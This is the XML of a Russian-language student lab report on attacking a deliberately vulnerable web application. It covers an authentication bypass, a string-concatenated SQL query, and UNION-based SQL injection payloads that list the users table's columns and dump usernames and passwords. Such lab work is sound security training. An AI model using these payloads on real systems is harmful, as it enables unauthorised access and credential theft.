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05B0F" w:rsidRDefault="00CE025C" w:rsidP="00CE025C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE025C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лабораторная работа №2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE025C" w:rsidRDefault="00CE025C" w:rsidP="00CE025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 Задание.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE025C" w:rsidRDefault="00CE025C" w:rsidP="00CE025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Выполнили скрипт для создания БД</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE025C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE025C" w:rsidRDefault="00CE025C" w:rsidP="00CE025C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE025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AAC2A8B" wp14:editId="5CECD790">
            <wp:extent cx="4762500" cy="4617410"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1206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68990" cy="46237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E025C" w:rsidRPr="00CE025C" w:rsidRDefault="00CE025C" w:rsidP="00CE025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Скопировали код уязвимого приложения с репозитория</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE025C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE025C" w:rsidRDefault="00CE025C" w:rsidP="00CE025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E025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3D2CAC4" wp14:editId="379DA8C0">
            <wp:extent cx="1247949" cy="1114581"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="285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47949" cy="11145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30CAE" w:rsidRDefault="00930CAE" w:rsidP="00CE025C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930CAE" w:rsidRDefault="00930CAE" w:rsidP="00CE025C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930CAE" w:rsidRDefault="00930CAE" w:rsidP="00CE025C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930CAE" w:rsidRDefault="00930CAE" w:rsidP="00CE025C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930CAE" w:rsidRDefault="00930CAE" w:rsidP="00CE025C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930CAE" w:rsidRDefault="00930CAE" w:rsidP="00CE025C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5F0D1D" w:rsidRDefault="005F0D1D" w:rsidP="00CE025C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D97386">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D97386" w:rsidRDefault="00D97386" w:rsidP="00CE025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Выполнили авторизацию без учётных данных</w:t>
      </w:r>
      <w:r w:rsidRPr="00D97386">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D97386" w:rsidRDefault="00930CAE" w:rsidP="00CE025C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930CA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A2BCE76" wp14:editId="2CBDC1F8">
            <wp:extent cx="2014600" cy="1721922"/>
            <wp:effectExtent l="19050" t="19050" r="24130" b="1206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28621" cy="17339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D97386" w:rsidRDefault="00D97386" w:rsidP="00CE025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Протестировали</w:t>
      </w:r>
      <w:r w:rsidRPr="00D973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sql-инъекцию </w:t>
      </w:r>
      <w:r w:rsidRPr="00D97386">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT username FROM users WHERE username = ' + username + ' </w:t>
      </w:r>
      <w:r w:rsidR="00930CAE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D97386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0B5289E" wp14:editId="4C6AF4A4">
            <wp:extent cx="5940425" cy="3788410"/>
            <wp:effectExtent l="19050" t="19050" r="22225" b="215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84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30CAE" w:rsidRPr="00C71E89" w:rsidRDefault="00C71E89" w:rsidP="00CE025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Нашли</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71E8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названия</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71E8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столбцов</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71E8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таблицы</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71E8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users через запрос</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71E89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a%' UNION ALL SELECT column_name, column_name, column_name FROM information_schema.columns WHERE table_name = 'users' -- -%':</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C71E89" w:rsidRDefault="00C71E89" w:rsidP="00CE025C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71E8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5AC66B8" wp14:editId="4117D5A9">
            <wp:extent cx="2018537" cy="1282536"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="133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33781" cy="12922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C71E89" w:rsidRDefault="00C71E89" w:rsidP="00CE025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Далее вывели информацию о пользователях через </w:t>
      </w:r>
      <w:r w:rsidRPr="00C71E89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a%' UNION SELECT NULL,username, password FROM users; #:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C71E89" w:rsidRPr="00C71E89" w:rsidRDefault="00C71E89" w:rsidP="00CE025C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71E8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5F37243" wp14:editId="6AE4AAE7">
            <wp:extent cx="3010320" cy="1695687"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="190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6956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C71E89" w:rsidRPr="00C71E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025C"/>
    <w:rsid w:val="00205B0F"/>
    <w:rsid w:val="005F0D1D"/>
    <w:rsid w:val="00930CAE"/>
    <w:rsid w:val="00C71E89"/>
    <w:rsid w:val="00CE025C"/>
    <w:rsid w:val="00D97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27F3C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E7537CC9-F66B-4BEB-A525-804B6EDF5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83</Words>
  <Characters>477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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>221</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-18T05:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-18T07:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>